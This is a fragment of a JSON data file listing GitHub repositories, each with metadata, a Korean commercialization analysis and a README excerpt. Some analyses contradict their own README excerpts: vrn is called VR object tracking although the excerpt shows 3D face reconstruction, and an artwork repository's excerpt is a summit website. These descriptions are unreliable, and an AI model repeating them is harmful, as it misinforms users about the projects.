[Programming](https://github.com/chastis/UniversityStuff/tree/master/Sem","composite_score":0.3304,"license_safety_tag":"unknown"},{"name":"PhilippeWeidmann/NotificationToast","github_url":"https://github.com/PhilippeWeidmann/NotificationToast","stars":9,"language":"Swift","license":"MIT","abandonment_months":16,"description":"# NotificationToast 저장소 분석\n\n## 왜 보물인가\n스마트폰이나 웹사이트에서 보이는 '알림 팝업'을 쉽게 만들 수 있는 도구로, 앱 개발자들이 반복적으로 처음부터 만드는 번거로움을 없애줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이메일 마케팅 플랫폼이 고객에게 \"메일 발송 완료\" 알림을 보일 때 사용\n2. **내부 업무","readme_excerpt":"\n# NotificationToast\n[![](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2FPhilippeWeidmann%2FNotificationToast%2Fbadge%3Ftype%3Dswift-versions)](https://swiftpackageindex.com/PhilippeWeidmann/NotificationToast)\n[![](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2FPhilippeWeidmann%2FNotificationToast%2Fbadge%3Ftype%3Dplatforms)](https://swiftpackageindex.com/PhilippeWeidmann/NotificationToast)  \n\nA view that tries to replicate iOS default toast message view.\n| Title  | Icon | Subtitle |\n| ------------- | ------------- | ------------- |\n| ![Title](./Screenshots/title.png)  | ![Icon](./Screenshots/icon.png) | ![Subtitle](./Screenshots/subtitle.png) |\n\n# Usage\nAdd this lib to your project using SPM or Cocoapods.\n\nTo get the simple \"Apple look\" you only have to do this:\n\n## UIKit\n\n```swift\nimport NotificationToast\n\nlet toast = ToastView(title: \"Safari pasted from Notes\")\ntoast.show()\n```\nThe view also incl","composite_score":0.3304,"license_safety_tag":"safe"},{"name":"rse/es6-features","github_url":"https://github.com/rse/es6-features","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":23,"description":"# ES6 Features 저장소 분석\n\n## 왜 보물인가\n현대 웹 개발의 기초가 되는 자바스크립트 최신 문법을 체계적으로 정리한 학습 자료로, 개발자들이 필요할 때마다 참고할 수 있는 실용적인 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 자바스크립트 초급자 대상 강좌 콘텐츠로 활용하여 구독료 수익화\n2. **기업 교육 서비스","readme_excerpt":"\n# [es6-features.org](http://es6-features.org/)\n\n### ECMAScript 6: Feature Overview &amp; Comparison\n\nCopyright (c) 2015-2017 Ralf S. Engelschall &lt;[rse@engelschall.com](mailto:rse@engelschall.com)&gt; &lt;[@engelschall](http://twitter.com/engelschall)&gt;<br/>\nPartially based on [code snippets](http://git.io/es6features) by Luke Hoban.<br/>\nLicensed under MIT license.\n\nThis is the source of the website [rse.github.io/es6-features/](https://rse.github.io/es6-features/),\na small overview of current\n[ECMAScript 6](http://www.ecma-international.org/publications/standards/Ecma-262.htm)\nlanguage features and a comparison to their old\nECMAScript 5 equivalents.\n\n## Frequently Asked Questions? (FAQ)\n\n- *Why was it setup? Is the ECMAScript 6 specification not enough?*\n\n  It was setup by computer scientist and software\n  architect [Ralf S. Engelschall](mailto:rse@engelschall.com) in March 2015 in order to\n  promote ECMAScript 6 in the software engineering projects around him\n  and to have book","composite_score":0.3303,"license_safety_tag":"unknown"},{"name":"Sophia-11/Machine-Learning-Notes","github_url":"https://github.com/Sophia-11/Machine-Learning-Notes","stars":8,"language":"","license":"unknown","abandonment_months":63,"description":"","readme_excerpt":"### Machine-Learning-Notes(加载图片较慢，请耐心等待,只显示一部分)\n* 如果刷新不出来，可以点击 [神经网络](https://mp.weixin.qq.com/s/usIVYjffOL6oBUGUDalYLg)  查看笔记大概是什么样子的\n\n* 周志华《机器学习》手推笔记（踏踏实实把公式学习推导一遍）\n\n* by 【计算机视觉联盟】 王博Kings、Sophia\n\n# 手推笔记十六章 214页 A4纸，可直接打印 ！！\n\n*Last updated: 2021/03/13*   **更新完结十六章**\n\n## 公众号【计算机视觉联盟】回复【西瓜书手推笔记】即可获得百度云pdf下载链接\n\n## 后续请大家继续关注另一个重磅笔记： [**深度学习手推笔记**](https://github.com/Sophia-11/DeepLearningNotes)\n\n## Table of Contents\n- [第一章绪论](https://github.com/Sophia-11/Machine-Learning-Notes/)\n- [第二章模型评估与选择](https://github.com/Sophia-11/Machine-Learning-Notes/)\n- [第三章线性模型](https://github.com/Sophia-11/Machine-Learning-Notes/)\n- [第四章决策树](https://github.com/Sophia-11/Machine-Learning-Notes/)\n- [第五章神经网络](https://github.com/Sophia-11/Machine-Learning-Notes/)\n- [第六章支持向量机](https://github.com/Sophia-11/Machine-Learning-Notes/)\n- [第七章贝叶斯分类器](https://github.com/Sophia-11/Machine-Learning-Notes/)\n- [第八章集成信息](https://github.com/Sophia-11/Machine-Learning-Notes/)\n- [第九章聚类](https://github.com/Sophia-11/Machine-Lear","composite_score":0.3301,"license_safety_tag":"unknown"},{"name":"OpnTec/libredesktop-artwork","github_url":"https://github.com/OpnTec/libredesktop-artwork","stars":11,"language":"HTML","license":"GPL-3.0","abandonment_months":19,"description":"# LibreDesktop Artwork 분석\n\n## 왜 보물인가\n무료 오픈소스 운영체제의 아름다운 디자인 자산을 제공하여, 누구나 전문가 수준의 시각 자료를 자유롭게 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **Linux 기반 운영체제 판매**: 오픈소스 Linux를 상용화하는 회사들이 일관된 브랜드 디자인 자산으로 구매\n2. **기업 내부 ","readme_excerpt":"# OpenTechSummit\nWebsite for OpenTechSummit\nhttps://opentechsummit.net\n","composite_score":0.33,"license_safety_tag":"restricted"},{"name":"drakeet/MultiType","github_url":"https://github.com/drakeet/MultiType","stars":5,"language":"Kotlin","license":"apache-2.0","abandonment_months":46,"description":"# MultiType 저장소 분석\n\n## 왜 보물인가\n앱을 만들 때 다양한 종류의 데이터를 효율적으로 관리해주는 도구로, 개발자들의 작업 시간을 크게 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소셜 미디어 피드 앱처럼 여러 타입의 콘텐츠(사진, 동영상, 텍스트)를 한 화면에 표시해야 하는 서비스\n- **내부 업무 도구**","readme_excerpt":"# MultiType\nEasier and more flexible to create multiple types for Android RecyclerView.\n\n[![Build Status](https://travis-ci.org/drakeet/MultiType.svg?branch=3.x)](https://travis-ci.org/drakeet/MultiType)\n[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](https://github.com/drakeet/MultiType/blob/master/LICENSE)\n![maven-central](https://img.shields.io/maven-central/v/com.drakeet.multitype/multitype.svg)\n![jetbrains-plugin](https://img.shields.io/jetbrains/plugin/v/9202-a8translate.svg)\n\nPreviously, when we need to develop a complex RecyclerView / ListView, it is difficult and\ntroublesome work. We should override the `getItemViewType()` of `RecyclerView.Adapter` , add some types, and create some `ViewHolder`s relating to those types. Once we need to add a new item type, we have to go to the original adapter file and modify some old codes carefully, \nand these adapter classes will get more complicated.\n\nNowadays, I created a new intuitive and flexible way to easily c","composite_score":0.33,"license_safety_tag":"safe"},{"name":"AaronJackson/vrn","github_url":"https://github.com/AaronJackson/vrn","stars":7,"language":"MATLAB","license":"mit","abandonment_months":47,"description":"# AaronJackson/vrn 분석\n\n## 왜 보물인가\n가상현실(VR) 환경에서 사물을 인식하고 추적하는 핵심 기술로, 메타버스나 게임, 산업용 VR 응용 분야의 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: VR 콘텐츠 제작 플랫폼에서 개발자들이 가상 물체를 쉽게 인식하도록 지원하는 도구\n2. **내부 업무 도구**","readme_excerpt":"* Large Pose 3D Face Reconstruction from a Single Image via Direct Volumetric Regression\n\n*Aaron S. Jackson, Adrian Bulat, Vasileios Argyriou and Georgios Tzimiropoulos*\n\n*Try out the code without running it!* Check out our online demo [[https://vrn.aaronsplace.co.uk][here]]. Alternatively,\npull the DockerHub image `asjackson:vrn`, see docs in the [[https://github.com/AaronJackson/vrn-docker][vrn-docker]] repo. \n\n[[http://aaronsplace.co.uk/papers/jackson2017recon/preview.png]]\n\nPlease visit our [[http://aaronsplace.co.uk/papers/jackson2017recon/][project webpage]] for a link to the paper and an\nexample video run on 300VW. This code is licenses under the MIT\nLicense, as described in the LICENSE file.\n\nThis is an unguided version of the Volumetric Regression Network (VRN)\nfor 3D face reconstruction from a single image. This method approaches\nthe problem of reconstruction as a segmentation problem, producing a\n3D volume, spatially aligned with the input image. A mesh can then be\nobtained ","composite_score":0.3299,"license_safety_tag":"safe"},{"name":"brightmart/albert_zh","github_url":"https://github.com/brightmart/albert_zh","stars":7,"language":"Python","license":"unknown","abandonment_months":43,"description":"# brightmart/albert_zh 분석 보고서\n\n## 왜 보물인가\n중국어 텍스트를 이해하고 분석할 수 있는 AI 모델로, 한중 사업을 하는 기업들이 고객 리뷰·문의·콘텐츠를 자동으로 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 중국 고객 지원 자동화 SaaS**\n- 중국 전자상거래 업체의 고객 문의를 자동 분류·답변하는 웹 서비스","readme_excerpt":"# albert_zh\n\nAn Implementation of <a href=\"https://arxiv.org/pdf/1909.11942.pdf\">A Lite Bert For Self-Supervised Learning Language Representations</a> with TensorFlow\n\nALBert is based on Bert, but with some improvements. It achieves state of the art performance on main benchmarks with 30% parameters less. \n\nFor albert_base_zh it only has ten percentage parameters compare of original bert model, and main accuracy is retained. \n\n\nDifferent version of ALBERT pre-trained model for Chinese, including TensorFlow, PyTorch and Keras, is available now.\n\n海量中文语料上预训练ALBERT模型：参数更少，效果更好。预训练小模型也能拿下13项NLP任务，ALBERT三大改造登顶GLUE基准\n\n<a href='https://www.cluebenchmarks.com/clueai.html'>clueai工具包: 三行代码，三分钟定制一个NLP的API（零样本学习）</a>\n\n<img src=\"https://github.com/brightmart/albert_zh/blob/master/resources/albert_tiny_compare_s.jpg\"  width=\"90%\" height=\"70%\" />\n\n一键运行10个数据集、9个基线模型、不同任务上模型效果的详细对比，见<a href=\"http://www.CLUEbenchmarks.com\">CLUE benchmark</a>\n\n一键运行CLUE中文任务：6个中文分类或句子对任务（新）\n---------------------------------","composite_score":0.3299,"license_safety_tag":"unknown"},{"name":"nozzle/react-static","github_url":"https://github.com/nozzle/react-static","stars":5,"language":"JavaScript","license":"mit","abandonment_months":43,"description":"# react-static 저장소 분석\n\n## 왜 보물인가\n웹사이트를 빠르고 간단하게 만들 수 있도록 도와주는 React 기반의 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 블로그 생성 플랫폼으로, 사용자가 드래그 앤 드롭으로 웹사이트를 만들고 호스팅하는 서비스\n2. **내부 업무 도구**: 마케팅팀이 랜딩페이지를 직접 제","readme_excerpt":"## This is now in maintenance only mode. No new major versions will be released.\n_Remix and NextJS are good alternatives._\n\n[Where is react-static 8? The state of react-static -- and its inevitable death. #1661](https://github.com/react-static/react-static/discussions/1661)\n\n----------------\n\n![React Static Logo](https://github.com/react-static/react-static/raw/master/media/react-static-logo-2x.png)\n\n[![Travis CI Build Status](https://travis-ci.org/react-static/react-static.svg?branch=master)](https://travis-ci.org/react-static/react-static) [![npm package v](https://img.shields.io/npm/v/react-static.svg)](https://www.npmjs.org/package/react-static) [![npm package dm](https://img.shields.io/npm/dm/react-static.svg)](https://npmjs.com/package/react-static)\n[![Github Stars](https://img.shields.io/github/stars/react-static/react-static.svg?style=social&label=Star)](https://github.com/react-static/react-static) [![Twitter Follow](https://img.shields.io/twitter/follow/reactstaticjs.svg?styl","composite_score":0.3299,"license_safety_tag":"safe"},{"name":"devtools-html/debugger.html","github_url":"https://github.com/devtools-html/debugger.html","stars":5,"language":"","license":"mpl-2.0","abandonment_months":41,"description":"# debugger.html 상용화 분석\n\n## 왜 보물인가\n웹 개발자들이 매일 사용하는 디버깅 도구를 직접 만들 수 있는 오픈소스 기반으로, 기존 도구의 한계를 개선한 맞춤형 솔루션을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 웹 개발 환경**\n- 웹 개발자를 위한 온라인 코딩 플랫폼(예: Replit, Gl","readme_excerpt":"# Firefox Debugger\n\nThe Firefox Debugger is now maintained in Mozilla's central repository.\n\n- Visit [docs][devtools-docs] to learn how to contribute\n- Checkout our [dashboard][gfb] to find good first bugs.\n- Go to [bugzilla][debugger-bugs] to report an issue or suggest an enhancement.\n- Feel free to ask questions at any point on [Matrix][devtools-matrix]\n\n![debugger-screenshot]\n\n[devtools-docs]: https://firefox-source-docs.mozilla.org/devtools/index.html?highlight=devtools#getting-started\n[debugger-bugs]: https://bugzilla.mozilla.org/enter_bug.cgi?product=DevTools&component=Debugger\n[gfb]: https://codetribute.mozilla.org/projects/devtools\n\n\n### Thank You\n\nThe Firefox Debugger was built in Github for the first 3 years of its development. Over 300+ volunteers contributed thousands of commits and built many of the features we take for granted today.\n\nWe hope to continue that spirit today in Mozilla Central. We believe the Debugger can be a great place to collaborate on the next iteration","composite_score":0.3299,"license_safety_tag":"unknown"},{"name":"go-xorm/xorm","github_url":"https://github.com/go-xorm/xorm","stars":5,"language":"Go","license":"bsd-3-clause","abandonment_months":75,"description":"# go-xorm/xorm 분석 리포트\n\n## 왜 보물인가\n데이터베이스와 프로그램을 연결하는 번역기 역할을 하는 오픈소스로, 복잡한 데이터 관리 작업을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 데이터를 안전하게 저장하고 빠르게 조회하는 웹 애플리케이션\n- **내부 업무 도구**: 회사의 사원 정보, 매출 현황 등을","readme_excerpt":"# xorm HAS BEEN MOVED TO https://gitea.com/xorm/xorm . THIS REPOSITORY WILL NOT BE UPDATED ANY MORE.\n\n[中文](https://github.com/go-xorm/xorm/blob/master/README_CN.md)\n\nXorm is a simple and powerful ORM for Go.\n\n[![CircleCI](https://circleci.com/gh/go-xorm/xorm.svg?style=shield)](https://circleci.com/gh/go-xorm/xorm) [![codecov](https://codecov.io/gh/go-xorm/xorm/branch/master/graph/badge.svg)](https://codecov.io/gh/go-xorm/xorm)\n[![](https://goreportcard.com/badge/github.com/go-xorm/xorm)](https://goreportcard.com/report/github.com/go-xorm/xorm) \n[![Join the chat at https://img.shields.io/discord/323460943201959939.svg](https://img.shields.io/discord/323460943201959939.svg)](https://discord.gg/HuR2CF3)\n\n## Features\n\n* Struct <-> Table Mapping Support\n\n* Chainable APIs\n\n* Transaction Support\n\n* Both ORM and raw SQL operation Support\n\n* Sync database schema Support\n\n* Query Cache speed up\n\n* Database Reverse support, See [Xorm Tool README](https://github.com/go-xorm/cmd/blob/master/README.","composite_score":0.3299,"license_safety_tag":"safe"},{"name":"BotoX/ServerStatus","github_url":"https://github.com/BotoX/ServerStatus","stars":6,"language":"C","license":"WTFPL","abandonment_months":33,"description":"# BotoX/ServerStatus 상품화 분석\n\n## 왜 보물인가\n서버가 제대로 작동하는지 실시간으로 감시하고 문제를 알려주는 시스템으로, 온라인 서비스를 운영하는 모든 기업에게 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 중소 웹사이트/앱 운영사들을 위한 저비용 서버 모니터링 서비스로 월 구독 제공\n\n**2. 내부","readme_excerpt":"# ServerStatus\n\nServerStatus is a full rewrite of [mojeda's](https://github.com/mojeda) [ServerStatus](https://github.com/mojeda/ServerStatus) script, which in turn is a modified version of [BlueVM's](http://www.lowendtalk.com/discussion/comment/169690#Comment_169690) script.\n\n### Live demo:\n* https://status.botox.bz/\n\nThere are many things which I dislike about the original script, for example:\n* requires webserver and PHP for every client\n* querys clients for every user that visits the site\n* hangs when said clients don't respond\n* loading slow with many servers\n* messy codebase\n* progress bar animation skips\n* setup process complicated\n\nTherefore I made my own ServerStatus which is quite different than the others under the hood, but still looks as nice!\n\nThe way my ServerStatus works is as following:\n* Master server listens on port 35061 TCP\n* Clients connect to the master server\n* Clients generate statistics and send it to the master server periodically (eg. every second)\n* Master ","composite_score":0.3299,"license_safety_tag":"safe"},{"name":"pedronauck/docz","github_url":"https://github.com/pedronauck/docz","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":6,"description":"# Docz 저장소 분석\n\n## 왜 보물인가\n기술 문서를 마치 블로그처럼 쉽게 만들고 관리할 수 있는 도구로, 소프트웨어 회사들이 고객에게 사용법을 설명하는 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 새로운 소프트웨어 서비스 가입자들을 위한 자동화된 설명서 및 튜토리얼 생성 플랫폼으로 제공\n- 고객이 직접 ","readme_excerpt":"# Docz\n\nDocz makes it easy to write and publish beautiful interactive documentation for your code.\nCreate MDX files showcasing your code and Docz turns them into a live-reloading, production-ready site.\n\n## Why?\n\nDocumenting code is one of the most important and time-consuming tasks when developing software.\n\nA lot of time is spent on building and maintaining custom documentation sites.\n\nDocz enables you to quickly create a live-reloading, SEO-friendly, production-ready documentation site with MDX and customize the look, feel and behavior when required by leveraging [GatsbyJS](https://www.gatsbyjs.org) and [Gatsby theme shadowing](https://www.gatsbyjs.org/docs/themes/shadowing/).\n\n## Getting started\n\nStart by adding `docz` as a dependency to your project with Yarn or npm:\n\n```bash\n$ yarn add docz # react react-dom\n\n# or\n\n$ npm install docz # react react-dom\n```\n\n> **Note**: `react` and `react-dom` will not be installed automatically. You'll have to install them yourself.\n\nThen, create ","composite_score":0.3298,"license_safety_tag":"safe"},{"name":"kubeless/kubeless","github_url":"https://github.com/kubeless/kubeless","stars":8,"language":"Go","license":"apache-2.0","abandonment_months":54,"description":"# Kubeless 프로젝트 분석\n\n## 왜 보물인가\n복잡한 서버 관리 없이 코드만 업로드하면 자동으로 실행되는 '서버리스' 기술로, 기업들이 인프라 운영 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 자동 이미지 처리 서비스: 고객이 사진을 업로드하면 자동으로 썸네일 생성 및 최적화\n- 정기 보고서 자동 생","readme_excerpt":"# <img src=\"https://cloud.githubusercontent.com/assets/4056725/25480209/1d5bf83c-2b48-11e7-8db8-bcd650f31297.png\" alt=\"Kubeless logo\" width=\"400\">\n\n[![CircleCI](https://circleci.com/gh/kubeless/kubeless.svg?style=svg)](https://circleci.com/gh/kubeless/kubeless)\n[![Slack](https://img.shields.io/badge/slack-join%20chat%20%E2%86%92-e01563.svg)](http://slack.k8s.io)\n[![Not Maintained](https://img.shields.io/badge/Maintenance%20Level-Not%20Maintained-yellow.svg)](https://gist.github.com/cheerfulstoic/d107229326a01ff0f333a1d3476e068d)\n\n## WARNING: Kubeless is no longer actively maintained by VMware.\n\nVMware has made the difficult decision to stop driving this project and therefore we will no longer actively respond to issues or pull requests. If you would like to take over maintaining this project independently from VMware, please let us know so we can add a link to your forked project here.\n\nThank You.\n\n## Overview\n\n`kubeless` is a Kubernetes-native serverless framework that lets you deploy","composite_score":0.3298,"license_safety_tag":"safe"},{"name":"CoderZhuXH/XHLaunchAd","github_url":"https://github.com/CoderZhuXH/XHLaunchAd","stars":5,"language":"Objective-C","license":"mit","abandonment_months":44,"description":"# XHLaunchAd 상용화 분석\n\n## 왜 보물인가\n앱이나 웹사이트를 처음 열 때 보여주는 광고 화면을 쉽게 만들고 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 모바일 앱 개발사들이 월 구독으로 가입하여 자신의 앱에 맞춤형 런칭 광고 화면을 자동으로 생성하고 관리할 수 있는 서비스\n2. **내부 업무 도구**:","readme_excerpt":"![](Logo/header.png)\n\n### Github下载不了/下载慢 可以访问国内下载地址: [https://gitee.com/CoderZhuXH/XHLaunchAd](https://gitee.com/CoderZhuXH/XHLaunchAd)\n\n### 开屏广告、启动广告解决方案-支持静态/动态图片广告/mp4视频广告\n\n[![AppVeyor](https://img.shields.io/appveyor/ci/gruntjs/grunt.svg?maxAge=2592000)](https://github.com/CoderZhuXH/XHLaunchAd)\n[![Version Status](https://img.shields.io/cocoapods/v/XHLaunchAd.svg?style=flat)](http://cocoadocs.org/docsets/XHLaunchAd)\n[![Support](https://img.shields.io/badge/support-iOS8%2B-brightgreen.svg)](https://github.com/CoderZhuXH/XHLaunchAd)\n[![Pod Platform](https://img.shields.io/cocoapods/p/XHLaunchAd.svg?style=flat)](http://cocoadocs.org/docsets/XHLaunchAd/)\n[![Pod License](https://img.shields.io/cocoapods/l/XHLaunchAd.svg?style=flat)](https://github.com/CoderZhuXH/XHLaunchAd/blob/master/LICENSE)\n\n### 特性:\n\n* 1.支持静态/动态图片广告.\n* 2.支持mp4视频广告.\n* 3.支持全屏/半屏广告.\n* 4.支持网络及本地资源.\n* 5.兼容iPhone和iPad.\n* 6.支持广告点击事件.\n* 7.支持自定义跳过按钮,添加子视图.\n* 8.支持设置数据等待时间.\n* 9.自带图片/视频下载,缓存功能.\n* 10.支持预缓存图片及视频.\n* 11.支持设置完成动画.\n* ","composite_score":0.3297,"license_safety_tag":"safe"},{"name":"chokcoco/jQuery-","github_url":"https://github.com/chokcoco/jQuery-","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":68,"description":"# chokcoco/jQuery- 분석 보고서\n\n## 왜 보물인가\n웹사이트를 더 예쁘고 부드럽게 만들어주는 jQuery 확장 도구로, 프론트엔드 개발자들이 반복적으로 찾는 기본 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 업무용 대시보드나 분석 도구의 사용자 인터페이스 개선 기능으로 판매\n2. **내부 업무 도구**","readme_excerpt":"# jQuery- v1.10.2 源码解读\n\n`jQuery` 源码中，中文注释是我的解读 ，才疏学浅，注释若有不正之处，万望告知。\n\n[详细全文中文注释请戳这里（未完待续）](https://github.com/chokcoco/jQuery-/blob/master/jquery-1.10.2__read.js)\n\n部分参考资料，收集如下\n\n## 源码类分析：\n[jQuery源码解析（架构与依赖模块)](http://www.imooc.com/view/172)\n\n[jQuery源码分析系列，博客园博文，作者：Aaron](http://www.cnblogs.com/aaronjs/p/3279314.html)\n\n[jQuery源码分析，博客园博文，作者：nuysoft](http://www.cnblogs.com/nuysoft/category/330604.html)\n\n[#菜鸟解读 jQuery#，前端狮子](http://www.html-js.com/article/column/136?page=2)\n\n[读懂jQuery](http://www.html-js.com/article/column/210)\n\n[jQuery源码剖析，拉风的博客](http://rapheal.sinaapp.com/tag/jquery-2/)\n\n[jQuery的deferred对象详解](http://www.ruanyifeng.com/blog/2011/08/a_detailed_explanation_of_jquery_deferred_object.html)\n\n[妙味课堂：一起学习jQuery源码](http://bbs.miaov.com/forum.php?mod=viewthread&tid=7385)\n\n\n## 工具类分析\n[jQuery API](https://oscarotero.com/jquery/)\n\n[jQuery source viewer](http://james.padolsey.com/jquery/)\n\n## 分模块解析\n#### jQuery处理技巧类\n[jQuery Hooks -- 钩子机制](http://blog.rodneyrehm.de/archives/11-jQuery-Hooks.","composite_score":0.3294,"license_safety_tag":"unknown"},{"name":"mengkunsoft/MKOnlineMusicPlayer","github_url":"https://github.com/mengkunsoft/MKOnlineMusicPlayer","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":60,"description":"# MKOnlineMusicPlayer 평가\n\n## 왜 보물인가\n누구나 쉽게 사용할 수 있는 온라인 음악 재생 프로그램으로, 복잡한 설치 과정 없이 음악을 들을 수 있는 편리한 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **음악 스트리밍 SaaS**: 개인 또는 소규모 음악 서비스를 운영하는 기업이 자체 플랫폼으로 활용할 수 있습니다.\n2. **사내 배","readme_excerpt":"MKOnlineMusicPlayer\n========\nMKOnlineMusicPlayer 是一款全屏的音乐播放器 UI 框架（为避免侵权，已移除所有后端功能）。\n\n前端界面参照 QQ 音乐网页版进行布局，同时采用了流行的响应式设计，无论是在PC端还是在手机端，均能给您带来原生 app 般的使用体验。\n\n> 本项目仅为学习前端的练手之作，请勿用作商业用途，请勿利用本项目搭建盗版音乐网站，否则后果自负！\n\n### 界面欣赏\n-----\n![主界面(电脑端)](https://user-images.githubusercontent.com/16880885/30487091-f7b45980-9a64-11e7-9588-8b6b87ac6763.jpg)\n\n![播放列表界面(电脑端)](https://user-images.githubusercontent.com/16880885/30487141-1f8ad416-9a65-11e7-960c-a102c47a3d0e.jpg)\n\n![歌曲搜索与播放](https://user-images.githubusercontent.com/16880885/30487344-c93a0306-9a65-11e7-92f3-552072b1dbce.jpg)\n\n### 相关链接\n-----\n**GitHub** [https://github.com/mengkunsoft/MKOnlineMusicPlayer](https://github.com/mengkunsoft/MKOnlineMusicPlayer)\n\n### 常见问题\n-----\n[请前往 wiki 查阅](https://github.com/mengkunsoft/MKOnlineMusicPlayer/wiki)\n\n**遇到问题请详细阅读以上 wiki！**\n\n\n### 开发文档[待完善]\n-----\n#### 播放列表DIY教程\n本播放器支持后台自定义播放列表。打开 `js/musicList.js`，按照里面的说明对应修改即可。\n\n#### 播放器DIY教程\n除了自定义播放列表，本播放器还支持一些 DIY 设定，比如修改 api.php 文件的默认路径、修改搜索框的默认搜索内容等。具体请打开 `js/player.js` 查看\n","composite_score":0.3294,"license_safety_tag":"unknown"},{"name":"DataTables/DataTables","github_url":"https://github.com/DataTables/DataTables","stars":6,"language":"CSS","license":"MIT","abandonment_months":4,"description":"# DataTables 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 대량의 데이터를 깔끔하게 정렬하고 검색할 수 있게 만들어주는 널리 사용되는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 관리 시스템(CRM)이나 판매 분석 대시보드에서 수천 개의 거래 기록을 표로 정렬해서 보여주기\n2. **내부 업무 도구**: 회사 직원들이 ","readme_excerpt":"# Legacy repository\n\nPlease note that this is a **legacy repo** for DataTables. The main source repo [is DataTables/DataTablesSrc](https://github.com/DataTables/DataTablesSrc).\n\nOur distribution repos (for NPM, Nuget, etc packages) are the `DataTables/Dist-*` repos - e.g. [DataTables/Dist-DataTables](https://github.com/DataTables/Dist-DataTables). Each distribution repo has a core Javascript file or styling for DataTables or an extension. Please use our [download builder](https://datatables.net/download) to obtain the files you need, including for NPM, Nuget, CDN and download.\n\n\n\n# DataTables plug-in for jQuery\n\nDataTables is a table enhancing plug-in for the [jQuery](//jquery.com) Javascript library, adding sorting, paging and filtering abilities to plain HTML tables with minimal effort. The stated goal of DataTables is:\n\n> To enhance the accessibility of data in HTML tables.\n\nTo meet this goal, DataTables is developed with two distinct groups of users in mind:\n\n* You the developers u","composite_score":0.3293,"license_safety_tag":"safe"},{"name":"alexa/alexa-skills-kit-sdk-for-nodejs","github_url":"https://github.com/alexa/alexa-skills-kit-sdk-for-nodejs","stars":5,"language":"TypeScript","license":"apache-2.0","abandonment_months":37,"description":"# Alexa Skills Kit SDK for Node.js 분석\n\n## 왜 보물인가\n아마존의 음성 비서 알렉사에 새로운 기능을 쉽게 만들어 추가할 수 있는 공식 도구로, 음성 기술 시장의 성장에 따라 수요가 계속 늘어나고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 스마트홈 제어 SaaS**\n- 사용자가 음성으로 조명, 온도, 보안 시스템을 제어할 ","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://m.media-amazon.com/images/G/01/mobile-apps/dex/avs/docs/ux/branding/mark1._TTH_.png\">\n  <br/>\n  <h1 align=\"center\">Alexa Skills Kit SDK for Node.js</h1>\n</p>\n\n*[English](https://github.com/alexa/alexa-skills-kit-sdk-for-nodejs/blob/2.0.x/README.md) | [日本語](https://github.com/alexa/alexa-skills-kit-sdk-for-nodejs/blob/2.0.x/README.ja.md)*\n\nThe **ASK SDK v2 for Node.js** makes it easier for you to build highly engaging skills by allowing you to spend more time on implementing features and less on writing boilerplate code.\n\nThe [**ASK SDK Controls Framework (Beta)**](https://github.com/alexa/ask-sdk-controls) builds on the ASK SDK v2 for Node.js, providing a scalable solution for creating large, multi-turn skills in code with reusable components called *controls*.\n\nThe **ASK SMAPI SDK for Node.js** provides developers a library for easily interacting with all Skill Management APIs (SMAPI), including interaction model, intent request history, and in-s","composite_score":0.3292,"license_safety_tag":"safe"},{"name":"github/india","github_url":"https://github.com/github/india","stars":5,"language":"Ruby","license":"CC0-1.0","abandonment_months":16,"description":"# github/india 분석 보고서\n\n## 왜 보물인가\n저장소 정보가 매우 제한적이어서 구체적인 가치 판단이 어렵지만, 인도 관련 데이터나 도구라면 빠르게 성장하는 아시아 시장의 니즈를 충족할 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 인도 시장 분석이 필요한 기업들을 위한 클라우드 기반 데이터 플랫폼\n2. *","readme_excerpt":"<p align=\"center\">\n<img src=\"assets/india_invertocat.png\" width=\"150\">\n</p>\n\n---\n\n# Welcome to GitHub India 🇮🇳\n\nIn this repo, you can find resources and information for the developer community in India.\n\n * [Open Source](#--open-source)\n     * [GitHub Grants for Open Source](#github-grants-for-open-source)\n     * [Resources](#resources)\n* [Developers](#octocat--developers)\n     * [Meetups](#meetups)\n     * [GitHub Stars](#github-stars)\n     * [The ReadME Project](#the-readme-project)\n* [Students](#-students)\n     * [Campus Program](#campus-program)\n     * [Student Developer Pack](#student-developer-pack)\n     * [Campus Experts](#campus-experts)\n* [Startups](#-startups)\n     * [GitHub for startups](#github-for-startups)\n* [Events](#-events)\n     * [GitHub Universe 2022](#github-universe-2022)\n* [Careers](#-careers)\n* [Let's connect](#-lets-connect)\n* [Contributing](#️contributing)\n* [License](#-license)\n\n---\n\n## 🧑‍💻  Open Source\n\nThe open-source ecosystem in India is thriving with many 